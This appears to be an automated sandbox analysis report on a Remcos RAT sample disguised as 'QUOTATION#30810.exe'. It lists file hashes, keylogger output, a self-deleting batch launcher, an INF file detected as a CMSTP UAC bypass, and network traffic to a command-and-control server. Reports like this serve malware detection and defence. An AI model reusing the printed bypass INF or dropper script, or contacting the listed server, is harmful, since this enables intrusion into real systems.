.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CB0.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6837214100155475
Encrypted:	false
SSDEEP:	96:TiZYWuYvCkNPUmauYpY3WQ7HVUYEZegtFipMc20wZ23aRlaRdFM3anxCIfi3:2ZDuYzdu+tSQaRlaJM3anxlfi3
MD5:	F3817227351124914AB80844A34E5236
SHA1:	0640FAEA50C35D5297C20D8E700FFACD525A9076
SHA-256:	ED5B49FA5C5C2FAB9C0610306D04150BADC997E915C403D036DE9AC3D5BDD307
SHA-512:	8A1F7626C93BC56F9647978B7202B7753B8C828B08CA77DB330041045B43DD05D94F9B9F84265E2C55BF967AE1D55237FA6E402C4DAB255F819C8301CD273481
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	390
Entropy (8bit):	3.354959817973958
Encrypted:	false
SSDEEP:	6:6llMf4b5YcIeeDAlS1gWAbfyP9hFouNGWRYr21P9hFouNGWRYr21gWAv:6leSecTWDhFiWG2PhFiWG2SW+
MD5:	4A6BB1285B626AD5ADB2B39B25419B0A
SHA1:	A76A7F719A4575485C37F75D5074ECD2883EE649
SHA-256:	94D44802BDCC7638ECFC46559EBB3E23ADCDCDDC5F60099AE779D83BA9B74F45
SHA-512:	CED11EE5F13451743E5EC91CB47D01316CF007036CAC3EBB6597A947A410FADC8C3A6226C612330BA528F3B62F830E358F5B809671BB97CBE8D6824589688044
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview:	....[.2.0.2.4./.0.5./.0.3. .1.3.:.1.3.:.3.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.E.n.t.e.r.].........[.C.o.n.n.e.c.t.i.o.n. .M.a.n.a.g.e.r. .P.r.o.f.i.l.e. .I.n.s.t.a.l.l.e.r.].........[.C.o.n.n.e.c.t.i.o.n. .M.a.n.a.g.e.r. .P.r.o.f.i.l.e. .I.n.s.t.a.l.l.e.r.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\QUOTATION#30810.exe.log

Download File

Process:	C:\Users\user\Desktop\QUOTATION#30810.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1088
Entropy (8bit):	5.389928136181357
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6Kh6+84xp3/Vcll1qE4GIs0E4KD:MxHKQwYHKGSI6o6+vxp3/ell1qHGIs0K
MD5:	7F03B15120D277413D7C08047184C8F5
SHA1:	0A6EEC1B9E6BB8FF846D21F7575E78B29C42A00F
SHA-256:	18E01DE8BB5C3C111EA89C01A4D28F1834BB02E26C0ECD86D8CCAB3835C79B2C
SHA-512:	8995C0BEA34B69FFEEE03FBB332223AB95502938A4789E64CBE8329F596E43C74676FF4550AD4F8506AAF6B955E6F8A5BDEAF1A5B6D71275D265DCE2D5478754
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\json[1].json

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	965
Entropy (8bit):	5.023626250399301
Encrypted:	false
SSDEEP:	12:tkeknd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7x:qPdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	1D705D315B7FECE2D6C13A47EFD128A7
SHA1:	32114D761B27C27C3686DC835AAD5E05B6B5A6F3
SHA-256:	52729AABEA95E5F9A1C211F9C952B6827328D2AA816B8138048F1691DD638023
SHA-512:	28CDA3717CD460797BD65CD6FD9CF79C683DB45DA67D0C1C27C3CDEAFFCEA6541CA36F63BD10C66BC36DA74B1399B9B4AA0A4F0F205C4E1A630BD6886E501148
Malicious:	false
Preview:	{. "geoplugin_request":"191.96.227.219",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Temp\bhv32CD.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x9cdd386c, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	15728640
Entropy (8bit):	0.1010164436272026
Encrypted:	false
SSDEEP:	1536:uSB2jpSB2jFSjlK/Qw/ZweshzbOlqVqdesWzbYFIeszO/Z5eHW5d:ua6a2UueqkzYRzOW
MD5:	249FEB833BF1C58EFC76A82D24633D3B
SHA1:	B4AA9A3B2DDC9A6EF5475A8FAACDE445423CECDD
SHA-256:	8E7F0BEC4C74B7BE40E4D00DDFBD99FE7FE7D20968BA56F829DEA9444B29B632
SHA-512:	84206F5C7EDF45E822A8D269371D54508F33C21000E006084EA38686688EF47F8D5B2A6E018D8D3C9A01BAD2B850161B521CA2E90D83A342F7A09FC65A291F26
Malicious:	false
Preview:	..8l... ...................':...{........................P......"...{#.'"...{..h.R.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{..................................xX.t'"...{...................G1.'"...{...........................#......h.R.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\lmxgukvurszvufgxilvllznhpy

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\tmpDAAA.tmp.bat

Download File

Process:	C:\Users\user\Desktop\QUOTATION#30810.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	153
Entropy (8bit):	4.985516907666043
Encrypted:	false
SSDEEP:	3:mKDDCMNqTtvL5oCHyg4EaKC5ZACSmqRDCHyg4E2J5xAInTRILWm5ZPy:hWKqTtT6CHhJaZ5Omq1CHhJ23fTlSk
MD5:	249952C87E173A8A8F5537BDF5EB57E9
SHA1:	59C6597800534448990CC3B965FCCFB7DB05865D
SHA-256:	8960695EA689DCC5EB111B7B0EC49D9EA83707338A73475C851B289F2392975D
SHA-512:	9F4BA3E7B7DFF9741AA83081E6303E34D0E119C4729F1292AC3BCAF7BD987A0F93EA2670340AD8C1AF4BC698B9EDE47D6A8BD8FA8CFD8B26B8773B98D1EF8C73
Malicious:	false
Preview:	@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpDAAA.tmp.bat" /f /q..

C:\Users\user\AppData\Roaming\svchost.exe

Download File

Process:	C:\Users\user\Desktop\QUOTATION#30810.exe
File Type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	948209
Entropy (8bit):	7.897920022229287
Encrypted:	false
SSDEEP:	24576:aKXqyUcHfHcPviAb/RwFfFTUg6Ak3CYLdN2:hjN0PaAb/RofT6/3CYLW
MD5:	C828227DB6D7BC08DD8E9B7313A0E770
SHA1:	81A583B2E03AC3A7AD698EF8722FE30D5B67F3AA
SHA-256:	9B2562B80E435348CFFE99AD86776E9CEF9B3F2745B170F297DE739FF8D55509
SHA-512:	7B8320243D3DF9676A7D4ADFA9703062E8AD636B09DCB55660890ECD2C42C85D7444B228E5FE975EA5EE676E234E6A260A3EE024858477E5F6CCC2E3E186F674
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 49%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..._............."...0.._............... ....@...... ..............................^.....`.............................................................2............................~..8............................................................ ..H............text...._... ...`.................. ..`.rsrc...2............b..............@..@........................................H........0..HN......O...................................................v......(....}#....(.....(...........(....}#....(......}.....(...........(....}#....(....../.r...ps....z..}......}.....(......{...."..}......{ ..."..} .....{!..."..}!.....{"..."..}"...f.(......%...%..$.o........{......{......{$..."..}$.....{%..."..}%.....{&..."..}&.....(@....{....,..{....,...}.....{......{...."..}......{...."..}......{...."..}......{'..."..}'.....{(..."..}(...*"..}...

C:\Windows\Temp\54bmrp0l.inf

Download File

Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	544
Entropy (8bit):	5.370358092487407
Encrypted:	false
SSDEEP:	12:fBz03qrcfhcoHU/0v3EQB5cJJBJfAVjk/jqJI9PCVM:5zT0bb4h4VA/uJIUVM
MD5:	BAD1ADDDD9DABBFB9C6096263C7EC625
SHA1:	9712E67D057DEEE58940E7A8D65037A67C2C4290
SHA-256:	38AA4CC2434CCBAFB0EA96C1712F156EA35F6C55418D847DE87FC0092BD0E21D
SHA-512:	C872025191941386371B6C6BAACA7DB733F3E0189AD8E8EAEA84EB0A1FE7FC62EBA714D350B9A5F67381CC92E379993D3FCCC85D9FBF32CB1C1014C0C23E9492
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Windows\Temp\54bmrp0l.inf, Author: Joe Security
Preview:	[version]..Signature=$chicago$..AdvancedINF=2.5.. ..[DefaultInstall]..CustomDestination=CustInstDestSectionAllUsers..RunPreSetupCommands=RunPreSetupCommandsSection.. ..[RunPreSetupCommandsSection]..C:\Users\user\AppData\Roaming\svchost.exe..taskkill /IM cmstp.exe /F.. ..[CustInstDestSectionAllUsers]..49000,49001=AllUSer_LDIDSection, 7.. ..[AllUSer_LDIDSection].."HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "".. ..[Strings]..ServiceName="VPN"..ShortSvcName="VPN".. ..

C:\Windows\Temp\macatsxh.inf

Download File

Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	544
Entropy (8bit):	5.370358092487407
Encrypted:	false
SSDEEP:	12:fBz03qrcfhcoHU/0v3EQB5cJJBJfAVjk/jqJI9PCVM:5zT0bb4h4VA/uJIUVM
MD5:	BAD1ADDDD9DABBFB9C6096263C7EC625
SHA1:	9712E67D057DEEE58940E7A8D65037A67C2C4290
SHA-256:	38AA4CC2434CCBAFB0EA96C1712F156EA35F6C55418D847DE87FC0092BD0E21D
SHA-512:	C872025191941386371B6C6BAACA7DB733F3E0189AD8E8EAEA84EB0A1FE7FC62EBA714D350B9A5F67381CC92E379993D3FCCC85D9FBF32CB1C1014C0C23E9492
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Windows\Temp\macatsxh.inf, Author: Joe Security
Preview:	[version]..Signature=$chicago$..AdvancedINF=2.5.. ..[DefaultInstall]..CustomDestination=CustInstDestSectionAllUsers..RunPreSetupCommands=RunPreSetupCommandsSection.. ..[RunPreSetupCommandsSection]..C:\Users\user\AppData\Roaming\svchost.exe..taskkill /IM cmstp.exe /F.. ..[CustInstDestSectionAllUsers]..49000,49001=AllUSer_LDIDSection, 7.. ..[AllUSer_LDIDSection].."HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "".. ..[Strings]..ServiceName="VPN"..ShortSvcName="VPN".. ..

C:\Windows\Temp\xrlumlnf.inf

Download File

Process:	C:\Users\user\AppData\Roaming\svchost.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	544
Entropy (8bit):	5.370358092487407
Encrypted:	false
SSDEEP:	12:fBz03qrcfhcoHU/0v3EQB5cJJBJfAVjk/jqJI9PCVM:5zT0bb4h4VA/uJIUVM
MD5:	BAD1ADDDD9DABBFB9C6096263C7EC625
SHA1:	9712E67D057DEEE58940E7A8D65037A67C2C4290
SHA-256:	38AA4CC2434CCBAFB0EA96C1712F156EA35F6C55418D847DE87FC0092BD0E21D
SHA-512:	C872025191941386371B6C6BAACA7DB733F3E0189AD8E8EAEA84EB0A1FE7FC62EBA714D350B9A5F67381CC92E379993D3FCCC85D9FBF32CB1C1014C0C23E9492
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Windows\Temp\xrlumlnf.inf, Author: Joe Security
Preview:	[version]..Signature=$chicago$..AdvancedINF=2.5.. ..[DefaultInstall]..CustomDestination=CustInstDestSectionAllUsers..RunPreSetupCommands=RunPreSetupCommandsSection.. ..[RunPreSetupCommandsSection]..C:\Users\user\AppData\Roaming\svchost.exe..taskkill /IM cmstp.exe /F.. ..[CustInstDestSectionAllUsers]..49000,49001=AllUSer_LDIDSection, 7.. ..[AllUSer_LDIDSection].."HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", "".. ..[Strings]..ServiceName="VPN"..ShortSvcName="VPN".. ..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372362187937068
Encrypted:	false
SSDEEP:	6144:+FVfpi6ceLP/9skLmb0fyWWSPtaJG8nAge35OlMMhA2AX4WABlguNZiL:uV1JyWWI/glMM6kF7Hq
MD5:	029F7629EFFE752017A5A1CBD9E197FB
SHA1:	2E765C07A27302BD2AD9E1361F1B6F67F682C55C
SHA-256:	1A238F66F301E60CB785928E79E3518A6779474689653DAF70C0AF58B601EBBA
SHA-512:	12448E78D7507E83848433E37971A89E75A77041F34C7FEB0CBB957EA152467EFE002DB5A8F18F4D05FCD16B3FF13D18C88FCA91D260825EDC0F3EBF9713D5E5
Malicious:	false
Preview:	regfD...D....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.9~.J...............................................................................................................................................................................................................................................................................................................................................J.h.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.41440934524794
Encrypted:	false
SSDEEP:	3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:	3DD7DD37C304E70A7316FE43B69F421F
SHA1:	A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:	713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:	false
Preview:	..Waiting for 3 seconds, press a key to continue ....2.1.0..

Static File Info

General

File type:	PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.897920022229287
TrID:	Win64 Executable Console Net Framework (206006/5) 48.58% Win64 Executable Console (202006/5) 47.64% Win64 Executable (generic) (12005/4) 2.83% Generic Win/DOS Executable (2004/3) 0.47% DOS Executable Generic (2002/1) 0.47%
File name:	QUOTATION#30810.exe
File size:	948'209 bytes
MD5:	c828227db6d7bc08dd8e9b7313a0e770
SHA1:	81a583b2e03ac3a7ad698ef8722fe30d5b67f3aa
SHA256:	9b2562b80e435348cffe99ad86776e9cef9b3f2745b170f297de739ff8d55509
SHA512:	7b8320243d3df9676a7d4adfa9703062e8ad636b09dcb55660890ecd2c42c85d7444b228e5fe975ea5ee676e234e6a260a3ee024858477e5f6ccc2e3e186f674
SSDEEP:	24576:aKXqyUcHfHcPviAb/RwFfFTUg6Ak3CYLdN2:hjN0PaAb/RofT6/3CYLW
TLSH:	9E1522EB9D1DB619C2AAC7337966A64C532F5F1C7DE5D283894DB62AC7332942032D03
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..._............."...0.._............... ....@...... ..............................^.....`................................

File Icon


Icon Hash:	443ad8d4dc581348

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9CE0EC5F [Tue May 27 19:17:51 2053 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x11432	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7ee0	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x5f8d	0x6000	92b6b03c2544bba39ab510f9853c03e0	False	0.6269124348958334	data	6.278239549236713	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x11432	0x11600	9c1091b053405d65c86871e6127ed558	False	0.06400348471223022	data	3.2843056467459597	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x815c	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m			0.05199337513308885
RT_GROUP_ICON	0x18984	0x14	data			1.15
RT_VERSION	0x18998	0x458	data			0.48741007194244607
RT_VERSION	0x18df0	0x458	data	English	United States	0.48830935251798563
RT_MANIFEST	0x19248	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/03/24-13:16:08.720498	TCP	2032777	ET TROJAN Remcos 3.x Unencrypted Server Response	4445	49708	172.245.208.13	192.168.2.8
05/03/24-13:13:40.463525	TCP	2032776	ET TROJAN Remcos 3.x Unencrypted Checkin	49708	4445	192.168.2.8	172.245.208.13

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2024 13:13:40.364094019 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:40.460907936 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:13:40.460989952 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:40.463525057 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:40.613137007 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:13:40.921427011 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:13:41.086757898 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:41.182976007 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:13:41.403181076 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:43.518416882 CEST	49708	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:43.659921885 CEST	4445	49708	172.245.208.13	192.168.2.8
May 3, 2024 13:13:43.876668930 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:43.975584984 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:43.975732088 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:43.976385117 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.078979015 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.078996897 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.079009056 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.079021931 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.079035044 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.079073906 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.079273939 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.079412937 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.079607010 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.079622030 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.079633951 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.079647064 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.079658985 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.079715967 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.175468922 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.175502062 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.175569057 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.175576925 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.175662041 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.175715923 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.175730944 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.175796986 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.175833941 CEST	49711	4445	192.168.2.8	172.245.208.13
May 3, 2024 13:13:44.175894022 CEST	4445	49711	172.245.208.13	192.168.2.8
May 3, 2024 13:13:44.175961971 CEST	4445	49711	172.245.208.13	192.168.2.8
